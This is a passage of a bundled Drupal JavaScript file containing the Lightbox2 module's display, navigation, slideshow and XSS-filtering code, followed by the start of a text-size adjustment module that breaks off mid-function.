          imgPreloader.onload = function() {};
        };

        imgPreloader.src = Lightbox.imageArray[Lightbox.activeImage][0];
        imgPreloader.alt = Lightbox.imageArray[Lightbox.activeImage][2];
      }

      // Set up frame size, etc.
      else if (Lightbox.isLightframe) {
        $("#lightbox #imageDataContainer").addClass('lightbox2-alt-layout-data');
        var src = Lightbox.imageArray[Lightbox.activeImage][0];
        $('#frameContainer').html('<iframe id="lightboxFrame" style="display: none;" src="'+src+'"></iframe>');

        // Enable swf support in Gecko browsers.
        if ($.browser.mozilla && src.indexOf('.swf') != -1) {
          setTimeout(function () {
            document.getElementById("lightboxFrame").src = Lightbox.imageArray[Lightbox.activeImage][0];
          }, 1000);
        }

        if (!Lightbox.iframe_border) {
          $('#lightboxFrame').css({'border': 'none'});
          $('#lightboxFrame').attr('frameborder', '0');
        }
        var iframe = document.getElementById('lightboxFrame');
        var iframeStyles = Lightbox.imageArray[Lightbox.activeImage][3];
        iframe = Lightbox.setStyles(iframe, iframeStyles);
        Lightbox.resizeContainer(parseInt(iframe.width, 10), parseInt(iframe.height, 10));
      }
      else if (Lightbox.isVideo || Lightbox.isModal) {
        $("#lightbox #imageDataContainer").addClass('lightbox2-alt-layout-data');
        var container = document.getElementById('modalContainer');
        var modalStyles = Lightbox.imageArray[Lightbox.activeImage][3];
        container = Lightbox.setStyles(container, modalStyles);
        if (Lightbox.isVideo) {
          Lightbox.modalHeight =  parseInt(container.height, 10) - 10;
          Lightbox.modalWidth =  parseInt(container.width, 10) - 10;
          Lightvideo.startVideo(Lightbox.imageArray[Lightbox.activeImage][0]);
        }
        Lightbox.resizeContainer(parseInt(container.width, 10), parseInt(container.height, 10));
      }
    }
  },

  // imgNodeLoadingError()
  imgNodeLoadingError: function(image) {
    var s = Drupal.settings.lightbox2;
    var original_image = Lightbox.imageArray[Lightbox.activeImage][0];
    if (s.display_image_size !== "") {
      original_image = original_image.replace(new RegExp("."+s.display_image_size), "");
    }
    Lightbox.imageArray[Lightbox.activeImage][0] = original_image;
    image.onerror = function() { Lightbox.imgLoadingError(image); };
    image.src = original_image;
  },

  // imgLoadingError()
  imgLoadingError: function(image) {
    var s = Drupal.settings.lightbox2;
    Lightbox.imageArray[Lightbox.activeImage][0] = s.default_image;
    image.src = s.default_image;
  },

  // resizeContainer()
  resizeContainer: function(imgWidth, imgHeight) {

    imgWidth = (imgWidth < Lightbox.minWidth ? Lightbox.minWidth : imgWidth);

    this.widthCurrent = $('#outerImageContainer').width();
    this.heightCurrent = $('#outerImageContainer').height();

    var widthNew = (imgWidth  + (Lightbox.borderSize * 2));
    var heightNew = (imgHeight  + (Lightbox.borderSize * 2));

    // Scalars based on change from old to new.
    this.xScale = ( widthNew / this.widthCurrent) * 100;
    this.yScale = ( heightNew / this.heightCurrent) * 100;

    // Calculate size difference between new and old image, and resize if
    // necessary.
    wDiff = this.widthCurrent - widthNew;
    hDiff = this.heightCurrent - heightNew;

    $('#modalContainer').css({'width': imgWidth, 'height': imgHeight});
    // Detect animation sequence.
    if (Lightbox.resizeSequence) {
      var animate1 = {width: widthNew};
      var animate2 = {height: heightNew};
      if (Lightbox.resizeSequence == 2) {
        animate1 = {height: heightNew};
        animate2 = {width: widthNew};
      }
      $('#outerImageContainer').animate(animate1, Lightbox.resizeSpeed).animate(animate2, Lightbox.resizeSpeed, 'linear', function() { Lightbox.showData(); });
    }
    // Simultaneous.
    else {
      $('#outerImageContainer').animate({'width': widthNew, 'height': heightNew}, Lightbox.resizeSpeed, 'linear', function() { Lightbox.showData(); });
    }

    // If new and old image are same size and no scaling transition is necessary
    // do a quick pause to prevent image flicker.
    if ((hDiff === 0) && (wDiff === 0)) {
      if ($.browser.msie) {
        Lightbox.pause(250);
      }
      else {
        Lightbox.pause(100);
      }
    }

    var s = Drupal.settings.lightbox2;
    if (!s.use_alt_layout) {
      $('#prevLink, #nextLink').css({'height': imgHeight + 'px'});
    }
    $('#imageDataContainer').css({'width': widthNew + 'px'});
  },

  // showData()
  // Display image and begin preloading neighbors.
  showData: function() {
    $('#loading').hide();

    if (Lightbox.isLightframe || Lightbox.isVideo || Lightbox.isModal) {
      Lightbox.updateDetails();
      if (Lightbox.isLightframe) {
        $('#frameContainer').show();
        if ($.browser.safari || Lightbox.fadeInSpeed === 0) {
          $('#lightboxFrame').css({'zIndex': '10500'}).show();
        }
        else {
          $('#lightboxFrame').css({'zIndex': '10500'}).fadeIn(Lightbox.fadeInSpeed);
        }
      }
      else {
        if (Lightbox.isVideo) {
          $("#modalContainer").html(Lightbox.modalHTML).click(function(){return false;}).css('zIndex', '10500').show();
        }
        else {
          var src = unescape(Lightbox.imageArray[Lightbox.activeImage][0]);
          if (Lightbox.imageArray[Lightbox.activeImage][4]) {
            $(src).appendTo("#modalContainer");
            $('#modalContainer').css({'zIndex': '10500'}).show();
          }
          else {
            // Use a callback to show the new image, otherwise you get flicker.
            $("#modalContainer").hide().load(src, function () {$('#modalContainer').css({'zIndex': '10500'}).show();});
          }
          $('#modalContainer').unbind('click');
        }
        // This might be needed in the Lightframe section above.
        //$('#modalContainer').css({'zIndex': '10500'}).show();
      }
    }

    // Handle display of image content.
    else {
      $('#imageContainer').show();
      if ($.browser.safari || Lightbox.fadeInSpeed === 0) {
        $('#lightboxImage').css({'zIndex': '10500'}).show();
      }
      else {
        $('#lightboxImage').css({'zIndex': '10500'}).fadeIn(Lightbox.fadeInSpeed);
      }
      Lightbox.updateDetails();
      this.preloadNeighborImages();
    }
    Lightbox.inprogress = false;

    // Slideshow specific stuff.
    if (Lightbox.isSlideshow) {
      if (!Lightbox.loopSlides && Lightbox.activeImage == (Lightbox.total - 1)) {
        if (Lightbox.autoExit) {
          Lightbox.slideIdArray[Lightbox.slideIdCount++] = setTimeout(function () {Lightbox.end('slideshow');}, Lightbox.slideInterval);
        }
      }
      else {
        if (!Lightbox.isPaused && Lightbox.total > 1) {
          Lightbox.slideIdArray[Lightbox.slideIdCount++] = setTimeout(function () {Lightbox.changeData(Lightbox.activeImage + 1);}, Lightbox.slideInterval);
        }
      }
      if (Lightbox.showPlayPause && Lightbox.total > 1 && !Lightbox.isPaused) {
        $('#lightshowPause').show();
        $('#lightshowPlay').hide();
      }
      else if (Lightbox.showPlayPause && Lightbox.total > 1) {
        $('#lightshowPause').hide();
        $('#lightshowPlay').show();
      }
    }

    // Adjust the page overlay size.
    var arrayPageSize = Lightbox.getPageSize();
    var arrayPageScroll = Lightbox.getPageScroll();
    var pageHeight = arrayPageSize[1];
    if (Lightbox.isZoomedIn && arrayPageSize[1] > arrayPageSize[3]) {
      var lightboxTop = (Lightbox.topPosition == '' ? (arrayPageSize[3] / 10) : Lightbox.topPosition) * 1;
      pageHeight = pageHeight + arrayPageScroll[1] + lightboxTop;
    }
    $('#lightbox2-overlay').css({'height': pageHeight + 'px', 'width': arrayPageSize[0] + 'px'});

    // Gecko browsers (e.g. Firefox, SeaMonkey, etc) don't handle pdfs as
    // expected.
    if ($.browser.mozilla) {
      if (Lightbox.imageArray[Lightbox.activeImage][0].indexOf(".pdf") != -1) {
        setTimeout(function () {
          document.getElementById("lightboxFrame").src = Lightbox.imageArray[Lightbox.activeImage][0];
        }, 1000);
      }
    }
  },

  // updateDetails()
  // Display caption, image number, and bottom nav.
  updateDetails: function() {

    $("#imageDataContainer").hide();

    var s = Drupal.settings.lightbox2;

    if (s.show_caption) {
      var caption = Lightbox.filterXSS(Lightbox.imageArray[Lightbox.activeImage][1]);
      if (!caption) caption = '';
      $('#caption').html(caption).css({'zIndex': '10500'}).show();
    }

    // If image is part of set display 'Image x of x'.
    var numberDisplay = null;
    if (s.image_count && Lightbox.total > 1) {
      var currentImage = Lightbox.activeImage + 1;
      if (!Lightbox.isLightframe && !Lightbox.isModal && !Lightbox.isVideo) {
        numberDisplay = s.image_count.replace(/\!current/, currentImage).replace(/\!total/, Lightbox.total);
      }
      else if (Lightbox.isVideo) {
        numberDisplay = s.video_count.replace(/\!current/, currentImage).replace(/\!total/, Lightbox.total);
      }
      else {
        numberDisplay = s.page_count.replace(/\!current/, currentImage).replace(/\!total/, Lightbox.total);
      }
      $('#numberDisplay').html(numberDisplay).css({'zIndex': '10500'}).show();
    }
    else {
      $('#numberDisplay').hide();
    }

    $("#imageDataContainer").hide().slideDown(Lightbox.slideDownSpeed, function() {
      $("#bottomNav").show();
    });
    if (Lightbox.rtl == 1) {
      $("#bottomNav").css({'float': 'left'});
    }
    Lightbox.updateNav();
  },

  // updateNav()
  // Display appropriate previous and next hover navigation.
  updateNav: function() {

    $('#hoverNav').css({'zIndex': '10500'}).show();
    var prevLink = '#prevLink';
    var nextLink = '#nextLink';

    // Slideshow is separated as we need to show play / pause button.
    if (Lightbox.isSlideshow) {
      if ((Lightbox.total > 1 && Lightbox.loopSlides) || Lightbox.activeImage !== 0) {
        $(prevLink).css({'zIndex': '10500'}).show().click(function() {
          if (Lightbox.pauseOnPrevClick) {
            Lightbox.togglePlayPause("lightshowPause", "lightshowPlay");
          }
          Lightbox.changeData(Lightbox.activeImage - 1); return false;
        });
      }
      else {
        $(prevLink).hide();
      }

      // If not last image in set, display next image button.
      if ((Lightbox.total > 1 && Lightbox.loopSlides) || Lightbox.activeImage != (Lightbox.total - 1)) {
        $(nextLink).css({'zIndex': '10500'}).show().click(function() {
          if (Lightbox.pauseOnNextClick) {
            Lightbox.togglePlayPause("lightshowPause", "lightshowPlay");
          }
          Lightbox.changeData(Lightbox.activeImage + 1); return false;
        });
      }
      // Safari browsers need to have hide() called again.
      else {
        $(nextLink).hide();
      }
    }

    // All other types of content.
    else {

      if ((Lightbox.isLightframe || Lightbox.isModal || Lightbox.isVideo) && !Lightbox.alternative_layout) {
        $('#frameHoverNav').css({'zIndex': '10500'}).show();
        $('#hoverNav').css({'zIndex': '10500'}).hide();
        prevLink = '#framePrevLink';
        nextLink = '#frameNextLink';
      }

      // If not first image in set, display prev image button.
      if ((Lightbox.total > 1 && Lightbox.loopItems) || Lightbox.activeImage !== 0) {
        // Unbind any other click handlers, otherwise this adds a new click handler
        // each time the arrow is clicked.
        $(prevLink).css({'zIndex': '10500'}).show().unbind().click(function() {
          Lightbox.changeData(Lightbox.activeImage - 1); return false;
        });
      }
      // Safari browsers need to have hide() called again.
      else {
        $(prevLink).hide();
      }

      // If not last image in set, display next image button.
      if ((Lightbox.total > 1 && Lightbox.loopItems) || Lightbox.activeImage != (Lightbox.total - 1)) {
        // Unbind any other click handlers, otherwise this adds a new click handler
        // each time the arrow is clicked.
        $(nextLink).css({'zIndex': '10500'}).show().unbind().click(function() {
          Lightbox.changeData(Lightbox.activeImage + 1); return false;
        });
      }
      // Safari browsers need to have hide() called again.
      else {
        $(nextLink).hide();
      }
    }

    // Don't enable keyboard shortcuts so forms will work.
    if (!Lightbox.isModal) {
      this.enableKeyboardNav();
    }
  },


  // enableKeyboardNav()
  enableKeyboardNav: function() {
    $(document).bind("keydown", this.keyboardAction);
  },

  // disableKeyboardNav()
  disableKeyboardNav: function() {
    $(document).unbind("keydown", this.keyboardAction);
  },

  // keyboardAction()
  keyboardAction: function(e) {
    if (e === null) { // IE.
      keycode = event.keyCode;
      escapeKey = 27;
    }
    else { // Mozilla.
      keycode = e.keyCode;
      escapeKey = e.DOM_VK_ESCAPE;
    }

    key = String.fromCharCode(keycode).toLowerCase();

    // Close lightbox.
    if (Lightbox.checkKey(Lightbox.keysClose, key, keycode)) {
      Lightbox.end('forceClose');
    }
    // Display previous image (p, <-).
    else if (Lightbox.checkKey(Lightbox.keysPrevious, key, keycode)) {
      if ((Lightbox.total > 1 && ((Lightbox.isSlideshow && Lightbox.loopSlides) || (!Lightbox.isSlideshow && Lightbox.loopItems))) || Lightbox.activeImage !== 0) {
        Lightbox.changeData(Lightbox.activeImage - 1);
      }

    }
    // Display next image (n, ->).
    else if (Lightbox.checkKey(Lightbox.keysNext, key, keycode)) {
      if ((Lightbox.total > 1 && ((Lightbox.isSlideshow && Lightbox.loopSlides) || (!Lightbox.isSlideshow && Lightbox.loopItems))) || Lightbox.activeImage != (Lightbox.total - 1)) {
        Lightbox.changeData(Lightbox.activeImage + 1);
      }
    }
    // Zoom in.
    else if (Lightbox.checkKey(Lightbox.keysZoom, key, keycode) && !Lightbox.disableResize && !Lightbox.disableZoom && !Lightbox.isSlideshow && !Lightbox.isLightframe) {
      if (Lightbox.isZoomedIn) {
        Lightbox.changeData(Lightbox.activeImage, false);
      }
      else if (!Lightbox.isZoomedIn) {
        Lightbox.changeData(Lightbox.activeImage, true);
      }
      return false;
    }
    // Toggle play / pause (space).
    else if (Lightbox.checkKey(Lightbox.keysPlayPause, key, keycode) && Lightbox.isSlideshow) {

      if (Lightbox.isPaused) {
        Lightbox.togglePlayPause("lightshowPlay", "lightshowPause");
      }
      else {
        Lightbox.togglePlayPause("lightshowPause", "lightshowPlay");
      }
      return false;
    }
  },

  preloadNeighborImages: function() {

    if ((Lightbox.total - 1) > Lightbox.activeImage) {
      preloadNextImage = new Image();
      preloadNextImage.src = Lightbox.imageArray[Lightbox.activeImage + 1][0];
    }
    if (Lightbox.activeImage > 0) {
      preloadPrevImage = new Image();
      preloadPrevImage.src = Lightbox.imageArray[Lightbox.activeImage - 1][0];
    }

  },

  end: function(caller) {
    var closeClick = (caller == 'slideshow' ? false : true);
    if (Lightbox.isSlideshow && Lightbox.isPaused && !closeClick) {
      return;
    }
    // To prevent double clicks on navigation links.
    if (Lightbox.inprogress === true && caller != 'forceClose') {
      return;
    }
    Lightbox.disableKeyboardNav();
    $('#lightbox').hide();
    $("#lightbox2-overlay").fadeOut();
    Lightbox.isPaused = true;
    Lightbox.inprogress = false;
    // Replaces calls to showSelectBoxes() and showFlash() in original
    // lightbox2.
    Lightbox.toggleSelectsFlash('visible');
    if (Lightbox.isSlideshow) {
      for (var i = 0; i < Lightbox.slideIdCount; i++) {
        window.clearTimeout(Lightbox.slideIdArray[i]);
      }
      $('#lightshowPause, #lightshowPlay').hide();
    }
    else if (Lightbox.isLightframe) {
      $('#frameContainer').empty().hide();
    }
    else if (Lightbox.isVideo || Lightbox.isModal) {
      if (!Lightbox.auto_modal) {
        $('#modalContainer').hide().html("");
      }
      Lightbox.auto_modal = false;
    }
  },


  // getPageScroll()
  // Returns array with x,y page scroll values.
  // Core code from - quirksmode.com.
  getPageScroll : function() {

    var xScroll, yScroll;

    if (self.pageYOffset || self.pageXOffset) {
      yScroll = self.pageYOffset;
      xScroll = self.pageXOffset;
    }
    else if (document.documentElement && (document.documentElement.scrollTop || document.documentElement.scrollLeft)) {  // Explorer 6 Strict.
      yScroll = document.documentElement.scrollTop;
      xScroll = document.documentElement.scrollLeft;
    }
    else if (document.body) {// All other Explorers.
      yScroll = document.body.scrollTop;
      xScroll = document.body.scrollLeft;
    }

    arrayPageScroll = [xScroll,yScroll];
    return arrayPageScroll;
  },

  // getPageSize()
  // Returns array with page width, height and window width, height.
  // Core code from - quirksmode.com.
  // Edit for Firefox by pHaez.

  getPageSize : function() {

    var xScroll, yScroll;

    if (window.innerHeight && window.scrollMaxY) {
      xScroll = window.innerWidth + window.scrollMaxX;
      yScroll = window.innerHeight + window.scrollMaxY;
    }
    else if (document.body.scrollHeight > document.body.offsetHeight) { // All but Explorer Mac.
      xScroll = document.body.scrollWidth;
      yScroll = document.body.scrollHeight;
    }
    else { // Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari.
      xScroll = document.body.offsetWidth;
      yScroll = document.body.offsetHeight;
    }

    var windowWidth, windowHeight;

    if (self.innerHeight) { // All except Explorer.
      if (document.documentElement.clientWidth) {
        windowWidth = document.documentElement.clientWidth;
      }
      else {
        windowWidth = self.innerWidth;
      }
      windowHeight = self.innerHeight;
    }
    else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode.
      windowWidth = document.documentElement.clientWidth;
      windowHeight = document.documentElement.clientHeight;
    }
    else if (document.body) { // Other Explorers.
      windowWidth = document.body.clientWidth;
      windowHeight = document.body.clientHeight;
    }
    // For small pages with total height less than height of the viewport.
    if (yScroll < windowHeight) {
      pageHeight = windowHeight;
    }
    else {
      pageHeight = yScroll;
    }
    // For small pages with total width less than width of the viewport.
    if (xScroll < windowWidth) {
      pageWidth = xScroll;
    }
    else {
      pageWidth = windowWidth;
    }
    arrayPageSize = new Array(pageWidth,pageHeight,windowWidth,windowHeight);
    return arrayPageSize;
  },


  // pause(numberMillis)
  pause : function(ms) {
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); }
    while (curDate - date < ms);
  },


  // toggleSelectsFlash()
  // Hide / unhide select lists and flash objects as they appear above the
  // lightbox in some browsers.
  toggleSelectsFlash: function (state) {
    if (state == 'visible') {
      $("select.lightbox_hidden, embed.lightbox_hidden, object.lightbox_hidden").show();
    }
    else if (state == 'hide') {
      $("select:visible, embed:visible, object:visible").not('#lightboxAutoModal select, #lightboxAutoModal embed, #lightboxAutoModal object').addClass("lightbox_hidden");
      $("select.lightbox_hidden, embed.lightbox_hidden, object.lightbox_hidden").hide();
    }
  },


  // parseRel()
  parseRel: function (link) {
    var parts = [];
    parts["rel"] = parts["title"] = parts["group"] = parts["style"] = parts["flashvars"] = null;
    if (!$(link).attr('rel')) return parts;
    parts["rel"] = $(link).attr('rel').match(/\w+/)[0];

    if ($(link).attr('rel').match(/\[(.*)\]/)) {
      var info = $(link).attr('rel').match(/\[(.*?)\]/)[1].split('|');
      parts["group"] = info[0];
      parts["style"] = info[1];
      if (parts["style"] != undefined && parts["style"].match(/flashvars:\s?(.*?);/)) {
        parts["flashvars"] = parts["style"].match(/flashvars:\s?(.*?);/)[1];
      }
    }
    if ($(link).attr('rel').match(/\[.*\]\[(.*)\]/)) {
      parts["title"] = $(link).attr('rel').match(/\[.*\]\[(.*)\]/)[1];
    }
    return parts;
  },

  // setStyles()
  setStyles: function(item, styles) {
    item.width = Lightbox.iframe_width;
    item.height = Lightbox.iframe_height;
    item.scrolling = "auto";

    if (!styles) return item;
    var stylesArray = styles.split(';');
    for (var i = 0; i< stylesArray.length; i++) {
      if (stylesArray[i].indexOf('width:') >= 0) {
        var w = stylesArray[i].replace('width:', '');
        item.width = jQuery.trim(w);
      }
      else if (stylesArray[i].indexOf('height:') >= 0) {
        var h = stylesArray[i].replace('height:', '');
        item.height = jQuery.trim(h);
      }
      else if (stylesArray[i].indexOf('scrolling:') >= 0) {
        var scrolling = stylesArray[i].replace('scrolling:', '');
        item.scrolling = jQuery.trim(scrolling);
      }
      else if (stylesArray[i].indexOf('overflow:') >= 0) {
        var overflow = stylesArray[i].replace('overflow:', '');
        item.overflow = jQuery.trim(overflow);
      }
    }
    return item;
  },


  // togglePlayPause()
  // Hide the pause / play button as appropriate.  If pausing the slideshow also
  // clear the timers, otherwise move onto the next image.
  togglePlayPause: function(hideId, showId) {
    if (Lightbox.isSlideshow && hideId == "lightshowPause") {
      for (var i = 0; i < Lightbox.slideIdCount; i++) {
        window.clearTimeout(Lightbox.slideIdArray[i]);
      }
    }
    $('#' + hideId).hide();
    $('#' + showId).show();

    if (hideId == "lightshowPlay") {
      Lightbox.isPaused = false;
      if (!Lightbox.loopSlides && Lightbox.activeImage == (Lightbox.total - 1)) {
        Lightbox.end();
      }
      else if (Lightbox.total > 1) {
        Lightbox.changeData(Lightbox.activeImage + 1);
      }
    }
    else {
      Lightbox.isPaused = true;
    }
  },

  triggerLightbox: function (rel_type, rel_group) {
    if (rel_type.length) {
      if (rel_group && rel_group.length) {
        $("a[rel^='" + rel_type +"\[" + rel_group + "\]'], area[rel^='" + rel_type +"\[" + rel_group + "\]']").eq(0).trigger("click");
      }
      else {
        $("a[rel^='" + rel_type +"'], area[rel^='" + rel_type +"']").eq(0).trigger("click");
      }
    }
  },

  detectMacFF2: function() {
    var ua = navigator.userAgent.toLowerCase();
    if (/firefox[\/\s](\d+\.\d+)/.test(ua)) {
      var ffversion = new Number(RegExp.$1);
      if (ffversion < 3 && ua.indexOf('mac') != -1) {
        return true;
      }
    }
    return false;
  },

  checkKey: function(keys, key, code) {
    return (jQuery.inArray(key, keys) != -1 || jQuery.inArray(String(code), keys) != -1);
  },

  filterXSS: function(str, allowed_tags) {
    var output = "";
    $.ajax({
      url: Drupal.settings.basePath + 'system/lightbox2/filter-xss',
      data: {
        'string' : str,
        'allowed_tags' : allowed_tags
      },
      type: "POST",
      async: false,
      dataType:  "json",
      success: function(data) {
        output = data;
      }
    });
    return output;
  }

};

// Initialize the lightbox.
Drupal.behaviors.initLightbox = function (context) {
  $('body:not(.lightbox-processed)', context).addClass('lightbox-processed').each(function() {
    Lightbox.initialize();
    return false; // Break the each loop.
  });

  // Attach lightbox to any links with lightbox rels.
  Lightbox.initList(context);
  $('#lightboxAutoModal', context).triggerHandler('click');
};

;
// $Id: jquery.textsize.js,v 1.1.2.8 2009/12/10 22:45:25 christianzwahlen Exp $

if (Drupal.jsEnabled) {
  $(document).ready(function(){
    $("a.ts_increase_variable").attr({ href: "#" });
    $("a.ts_decrease_variable").attr({ href: "#" });
    $("a.ts_normal_variable").attr({ href: "#" });
    $("a.ts_increase_fix").attr({ href: "#" });
    $("a.ts_decrease_fix").attr({ href: "#" });
    $("a.ts_normal_fix").attr({ href: "#" });
    function textsizeDisplayCalc(ts_v) {
      if (textsizeDisplay == 1) {
        ts_c = (100 * ts_v / textsizeNormal);
        return Math.round(ts_c);
      }
      else {
        return ts_v;
      }
    }
    function textsizeIncrease(ts_a, ts_b) {
      if (ts_a == textsizeMaximum) {
        return ts_a;
      }
      else {
        return 1*ts_a + 1*textsizeIncrement;
      }
    }
    function textsizeDecrease(ts_a, ts_b) {
      if (ts_a == textsizeMinimum) {
        return ts_a;
      }
      else {
        return 1*ts_a - 1*textsizeIncrement;
      }
    }
    function TSremoveBC(){
      var tsElement = $(textsizeElement + textsizeElementClass);
      var tsClasses = tsElement.attr('class').split(' ');
      for( var i in tsClasses ){
        if( tsClasses[i].substring(0,8) == 'textsize' ){
          tsElement.removeClass( tsClasses[i] );
          break;
        }
      }
    }
    function tsIncrease(){
      TSremoveBC();
      $("#textsize_current").empty();
      $("#textsize_current").append((textsizeNormalDisplay + textsizeIncrementDisplay) + '%');
      $("#textsize_current").attr({ title: textsizeCurrentText + ": " + (textsizeNormalDisplay + textsizeIncrementDisplay) + '%'});
      $(textsizeElement + textsizeElementClass).addClass('textsize-' + (textsizeNormal + textsizeIncrement));
      $(textsizeElement + textsizeElementClass).css("font-size", (textsizeNormal + textsizeIncrement) + "%");
      $.cookie('textsize', textsizeIncrease(textsizeNormalDisplay, textsizeIncrementDisplay), { expires: textsizeCookieExpires, path: textsizeCookieDomain});
      return false;
    }
    function tsDecrease(){
      TSremoveBC();
      $("#textsize_current").empty();
      $("#textsize_current").append((textsizeNormalDisplay - textsizeIncrementDisplay) + '%');
      $("#textsize_current").attr({ title: textsizeCurrentText + ": " + (textsizeNormalDisplay - textsizeIncrementDisplay) + '%'});
      $(textsizeElement + textsizeElementClass).addClass('textsize-' + (textsizeNormal - textsizeIncrement));
      $(textsizeElement + textsizeElementClass).css("font-size", (textsizeNormal - textsizeIncrement) + "%");
      $.cookie('textsize', textsizeDecrease(textsizeNormalDisplay, textsizeIncrementDisplay), { expires: textsizeCookieExpires, path: textsizeCookieDomain});
      return false;
    }
    function tsNormal(){
      TSremoveBC();
      $("#textsize_current").empty();
      $("#textsize_current").append(textsizeNormalDisplay + '%');
      $("#textsize_current").removeClass('error');
      $("#textsize_current").attr({ title: textsizeCurrentText + ": " + textsizeNormalDisplay + '%'});
      $(textsizeElement + textsizeElementClass).addClass('textsize-' + textsizeNormal);
      $(textsizeElement + textsizeElementClass).css("font-size", textsizeNormal + "%");
      $.cookie('textsize', textsizeNormal, { expires: textsizeCookieExpires, path: textsizeCookieDomain});
      return false;
    }
    function tsForm() {
      var ts_val = $("#edit-textsize-select").val();
      var ts_val_d = textsizeDisplayCalc($("#edit-textsize-select").val());
      TSremoveBC();
      $.cookie('textsize', ts_val, { expires: textsizeCookieExpires, path: textsizeCookieDomain});
      $(textsizeElement + textsizeElementClass).addClass("textsize-" + ts_val);
      $("#textsize_current").empty();
      $("#textsize_current").append(ts_val_d + '%');
      $("#textsize_current").attr({ title: textsizeCurrentText + ": " + ts_val_d + '%'});
      $(textsizeElement + textsizeElementClass).addClass('textsize-' + ts_val);
      $(textsizeElement + textsizeElementClass).css("font-size", ts_val + "%");
    }
    $("a.ts_increase_variable[href=#]").click(
      function (){
        if ($.cookie("textsize") && $.cookie("textsize") < textsizeMaximum) {
          TSremoveBC();
          $.cookie('textsize', textsizeIncrease($.cookie("textsize"), textsizeIncrement), { expires: textsizeCookieExpires, path: textsizeCookieDomain});
          $("#textsize_current").empty();
          $("#textsize_current").append( textsizeDisplayCalc($.cookie("textsize")) + '%');
          $("#textsize_current").attr({ title: textsizeCurrentText + ": " + textsizeDisplayCalc($.cookie("textsize")) + '%'});
          $("#textsize_current").removeClass('error');
          $(textsizeElement + textsizeElementClass).addClass('textsize-' + $.cookie("textsize"));
          $(textsizeElement + textsizeElementClass).css("font-size", $.cookie("textsize") + "%");
          return false;
        }
        else if ($.cookie("textsize") && ($.cookie("textsize") == textsizeMaximum) && textsizeReset == 0) {
          $("#textsize_current").empty();
          $("#textsize_current").append( '<abbr title="' + Drupal.t('Maximum') + '" class="textsize">' + Drupal.t('Max.') + '</abbr> ' + textsizeDisplayCalc(textsizeMaximum) + '%');
          $("#textsize_current").addClass('error');
          return false;
        }
        else if ($.cookie("textsize") && ($.cookie("textsize") == textsizeMaximum) && textsizeReset == 1) {
          tsNormal()
          return false;
        }
      }
    );
    $("a.ts_increase_fix[href=#]").click(
      function (){
        if ($.cookie("textsize") && $.cookie("textsize") < (textsizeNormal + textsizeIncrement)) {
          TSremoveBC();
          $.cookie('textsize', (textsizeNormal + textsizeIncrement), { expires: textsizeCookieExpires, path: textsizeCookieDomain});
          $("#textsize_current").empty();
          $("#textsize_current").append( textsizeDisplayCalc($.cookie("textsize")) + '%');
          $("#textsize_current").attr({ title: textsizeCurrentText + ": " + textsizeDisplayCalc($.cookie("textsize")) + '%'});
          $("#textsize_current").removeClass('error');
          $(textsizeElement + textsizeElementClass).addClass('textsize-' + (textsizeNormal + textsizeIncrement));
          $(textsizeElement + textsizeElementClass).css("font-size", (textsizeNormal + textsizeIncrement) + "%");
          return false;
        }
        else if ($.cookie("textsize") && $.cookie("textsize") == (textsizeNormal + textsizeIncrement)) {
          $("#textsize_current").empty();
          $("#textsize_current").append( '<abbr title="' + Drupal.t('Maximum') + '" class="textsize">' + Drupal.t('Max.') + '</abbr> ' + textsizeDisplayCalc((textsizeNormal + textsizeIncrement)) + '%');
          $("#textsize_current").addClass('error');
          return false;
        }
        else {
          tsIncrease()
        }
      }
    );
    $("a.ts_decrease_variable[href=#]").click(
      function (){
        if ($.cookie("textsize") && $.cookie("textsize") > textsizeMinimum) {
          TSremoveBC();
          $.cookie('textsize', textsizeDecrease($.cookie("textsize"), textsizeIncrement), { expires: textsizeCookieExpires, path: textsizeCookieDomain});
          $("#textsize_current").empty();
          $("#textsize_current").append( textsizeDisplayCalc($.cookie("textsize")) + '%');
          $("#textsize_current").attr({ title: textsizeCurrentText + ": " + textsizeDisplayCalc($.cookie("textsize")) + '%'});
          $("#textsize_current").removeClass('error');
          $(textsizeElement + textsizeElementClass).addClass('textsize-' + $.cookie("textsize"));
          $(textsizeElement + textsizeElementClass).css("font-size", $.cookie("textsize") + "%");
          return false;
        }
        else if ($.cookie("textsize") && ($.cookie("textsize") == textsizeMinimum) && textsizeReset == 0) {
          $("#textsize_current").empty();
          $("#textsize_current").append( '<abbr title="' + Drupal.t('Minimum') + '" class="textsize">' + Drupal.t('Min.') + '</abbr> ' + textsizeDisplayCalc(textsizeMinimum) + '%');
          $("#textsize_current").addClass('error');
          return false;
        }
        else if ($.cookie("textsize") && ($.cookie("textsize") == textsizeMinimum) && textsizeReset == 1) {
          tsNormal()
          return false;
        }
      }
    );
    $("a.ts_decrease_fix[href=#]").click(
      function (){
        if ($.cookie("textsize") && $.cookie("textsize") > (textsizeNormal - textsizeIncrement)) {
          TSremoveBC();
          $.cookie('textsize', (textsizeNormal - textsizeIncrement), { expires: textsizeCookieExpires, path: textsizeCookieDomain});
          $("#textsize_current").empty();
          $("#textsize_current").append( textsizeDisplayCalc($.cookie("textsize")) + '%');
          $("#textsize_current").attr({ title: textsizeCurrentText + ": " + textsizeDisplayCalc($.cookie("textsize")) + '%'});
          $("#textsize_current").removeClass('error');
          $(textsizeElement + textsizeElementClass).addClass('textsize-' + (textsizeNormal - textsizeIncrement));
          $(textsizeElement + textsizeElementClass).css("font-size", (textsizeNormal - textsizeIncrement) + "%");
          return false;
        }
        else if ($.cookie("textsize") && $.cookie("textsize") == (textsizeNormal - textsizeIncrement)) {
          $("#textsize_current").empty();
          $("#textsize_current").append( '<abbr title="' + Drupal.t('Minimum') + '" class="textsize">' + Drupal.t('Min.') + '</abbr> ' + textsizeDisplayCalc((textsizeNormal - textsizeIncrement)) + '%');
          $("#textsize_current").addClass('error');
          return false;
        }
        else {
          tsDecrease()
        }
      }
    );
    $("a.ts_normal_variable[href=#]").click(
      function (){
        tsNormal();
        return false;
      }
    );
    $("a.ts_normal_fix[href=#]").click(
      function (){
        tsNormal();
        return false;
      }
    );
    $("#edit-textsize-select").change(tsForm);
    $("#edit-textsize-submit").hide();
    $("img.ts_rollover").hover(
      function(){
        if($(this).attr("src").indexOf("16_hover") == -1) {
          var newSrc = $(this).attr("src").replace("16.gif","16_hover.gif#hover");
          $(this).attr("src",newSrc);
        }
      },
      function(){
        if($(this).attr("src").indexOf("16_hover.gif#hover") != -1) {
          var oldSrc = $(this).attr("src").replace("16_hover.gif#hover","16.gif");
